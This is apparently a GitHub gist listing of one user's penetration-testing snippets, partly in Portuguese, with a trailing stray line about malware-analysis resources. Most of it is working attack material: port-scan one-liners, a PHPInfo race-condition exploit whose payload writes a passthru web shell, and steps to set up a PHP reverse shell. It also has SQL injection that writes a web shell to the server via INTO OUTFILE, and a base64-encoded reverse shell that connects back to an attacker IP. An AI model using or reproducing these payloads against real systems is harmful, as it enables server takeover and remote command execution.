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diegoalbuquerque /
Created August 21, 2019 12:24 — forked from sminez/
Find examples of pen testing methods and tools in videos by Ippsec (as of 26th June 2019)
#!/usr/bin/env python3
Script used to pull down the current video descriptions from ippsec's youtube channel.
The raw output still has a few HTML tags that need to be manually removed and there
also seem to be multiple duplicates of videos that have been removed in the output
saved as ippsec-details.txt
import re
import sys
nmap -T5 --host-timeout 4s --min-rate 1000 -PN -n -p <PORTAS> <SERVER>
for i in {1..2000}; do nc -vz <SERVER> $i 2>&1 | grep -vi "failed"; done
diegoalbuquerque / infosec-tools.txt
Created April 12, 2020 11:20
many infosec tools
Security Tool List
│ ├───ACLPwn
│ ├───ACL_PWN
│ ├───ADAPE
│ ├───ADAudit
│ ├───ADCollector
│ ├───ADpwn
│ ├───ADRecon
│ ├───ADReconPowershell
diegoalbuquerque /
Created May 7, 2020 20:39 — forked from intrd/
PHP : Winning the race condition vs Temporary File Upload - PHPInfo() exploit
## PHP : Winning the race condition vs Temporary File Upload - PHPInfo() exploit
# Alternative way to easy_php @ N1CTF2018, solved by intrd & shrimpgo - p4f team
# @license Creative Commons Attribution-ShareAlike 4.0 International License -
## passwords.txt payload content
# <?php $c=fopen('/app/intrd','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>
import sys,Queue,threading,hashlib,os, requests, pickle, os.path, re
from subprocess import Popen, PIPE, STDOUT
diegoalbuquerque /
Created May 12, 2020 18:44 — forked from touilleMan/
Simple Python Http Server with Upload - Python3 version
#!/usr/bin/env python3
"""Simple HTTP Server With Upload.
This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.
diegoalbuquerque /
Last active May 19, 2020 20:10
Preparando o WebShell
root@kbca# locate webshell | grep revers
root@kbca# cp /usr/share/webshells/php/php-reverse-shell.php meu-lindo-shell.php
# >>>> Precisamos Substituir o IP e Porta <<<<
root@kbca# grep -i "CHANGE THIS" meu-lindo-shell.php
$ip = ''; // CHANGE THIS
diegoalbuquerque / code-injection1.sql
Last active May 19, 2020 20:12
Code Injection Example
myusername=john&mypassword=-9334' OR 1908=1908 LIMIT 0,1 INTO OUTFILE
'/var/www/meu-lindo-shell.php' LINES TERMINATED BY
0x3c3f7068 (... todo o hexa aqui ...)-- -
diegoalbuquerque / eval_base64decode.php
Created May 19, 2020 21:52
Exemplo de de-conversão base64 e execução de código em php
<?php eval(base64_decode('<codigo em base64')); ?>
diegoalbuquerque / gist:d43f583036ef8862b25064e2f05b31af
Last active May 19, 2020 22:06
example of php base 64 on sqli
myusername=john&mypassword=-9334' OR 1908=1908 limit 0,0 union all select "<?php eval(base64_decode(",”'c2V0X3RpbWVfbGltaXQgKDApOwokVkVSU0lPTiA9ICIxLjAiOwokaXAgPSAnMTkyLjE2OC4yMDAuMyc7ICAvLyBDSEFOR0UgVEhJUwokcG9ydCA9IDQ0MzsgICAgICAgLy8gQ0hBTkdFIFRISVMKJGNodW5rX3NpemUgPSAxNDAwOwokd3JpdGVfYSA9IG51bGw7CiRlcnJvcl9hID0gbnVsbDsKJHNoZWxsID0gJ3VuYW1lIC1hOyB3OyBpZDsgL2Jpbi9zaCAtaSc7CiRkYWVtb24gPSAwOwokZGVidWcgPSAwOwoKCmlmIChmdW5jdGlvbl9leGlzdHMoJ3BjbnRsX2ZvcmsnKSkgewoJJHBpZCA9IHBjbnRsX2ZvcmsoKTsKCQoJaWYgKCRwaWQgPT0gLTEpIHsKCQlwcmludGl0KCJFUlJPUjogQ2FuJ3QgZm9yayIpOwoJCWV4aXQoMSk7Cgl9CgkKCWlmICgkcGlkKSB7CgkJZXhpdCgwKTsgIC8vIFBhcmVudCBleGl0cwoJfQoKCWlmIChwb3NpeF9zZXRzaWQoKSA9PSAtMSkgewoJCXByaW50aXQoIkVycm9yOiBDYW4ndCBzZXRzaWQoKSIpOwoJCWV4aXQoMSk7Cgl9CgoJJGRhZW1vbiA9IDE7Cn0gZWxzZSB7CglwcmludGl0KCJXQVJOSU5HOiBGYWlsZWQgdG8gZGFlbW9uaXNlLiAgVGhpcyBpcyBxdWl0ZSBjb21tb24gYW5kIG5vdCBmYXRhbC4iKTsKfQoKY2hkaXIoIi8iKTsKCnVtYXNrKDApOwoKCiRzb2NrID0gZnNvY2tvcGVuKCRpcCwgJHBvcnQsICRlcnJubywgJGVycnN0ciwgMzApOwppZiAoISRzb2NrKSB7CglwcmludGl0

Assembly Language / Reversing / Malware Analysis -resources

Twitter: Muffin

⭐Assembly Language